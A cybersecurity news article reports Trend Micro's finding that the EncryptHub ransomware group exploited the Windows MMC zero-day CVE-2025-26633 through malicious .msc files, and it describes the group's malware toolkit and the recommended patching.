WHAT ARE YOU LOOKING FOR?

Popular Tags

Raleigh, NC

32°F
Scattered Clouds Humidity: 79%
Wind: 2.06 M/S

Russian Hackers Exploit Windows Zero-Day Before Patch

Security Hits: 215
Russian Hackers Exploit Windows Zero-Day Before Patch

Russian Ransomware Gang Exploits Microsoft Zero-Day CVE-2025-26633 in Active Attacks 

Security researchers at Trend Micro have linked a recently patched Microsoft zero-day vulnerability to active exploitation by a Russian ransomware group. 

The flaw, tracked as CVE-2025-26633, was among the six zero-days Microsoft addressed in its latest Patch Tuesday updates. Trend Micro attributes its exploitation to EncryptHub, a ransomware affiliate of RansomHub, also referred to as Water Gamayu by the security firm. 

According to Trend Micro, the group has been abusing a flaw in the Microsoft Management Console (MMC) framework to execute malicious code and steal sensitive data from targeted systems. The attack method involves manipulating MMC’s handling of Microsoft Console (.msc) files and the Multilingual User Interface Path (MUIPath) feature. 

Attack Methodology 

The attackers create two .msc files with identical names—one clean and the other malicious—placing the rogue file in an "en-US" directory. 

When mmc.exe runs, it prioritizes the malicious file via MUIPath instead of the legitimate one, enabling stealthy execution of commands. 

The attackers also exploit MMC’s ActiveX control snap-in, leveraging the ExecuteShellCommand method to download and execute further payloads. 

Another tactic involves creating fake trusted directories resembling legitimate system paths to drop and execute malicious files. 

Expanding Attack Toolkit 

Trend Micro’s analysis revealed that Water Gamayu is actively evolving its attack techniques, deploying multiple malware strains, including: 

  • EncryptHub stealer – designed to exfiltrate sensitive data 
  • DarkWisp backdoor – providing remote access to compromised systems 
  • SilentPrism backdoor – used for stealthy persistence 
  • Rhadamanthys stealer – targeting financial and credential data 

This is not the first time a Microsoft Management Console (MMC) vulnerability has been exploited. In October 2024, Microsoft confirmed that attackers had leveraged Microsoft Saved Console (MSC) files to execute remote code on Windows systems. 

Security researchers recommend immediate patching and implementing advanced threat detection to mitigate these ongoing attacks. 

Found this article interesting? Follow us on X(Twitter)  and FaceBook to read more exclusive content we post. 

Image
Back To Top

With Cybersecurity Insights, current news and event trends will be captured on cybersecurity, recent systems / cyber-attacks, artificial intelligence (AI), technology innovation happening around the world; to keep our viewers fast abreast with the current happening with technology, system security, and how its effect our lives and ecosystem. 

Please fill the required field.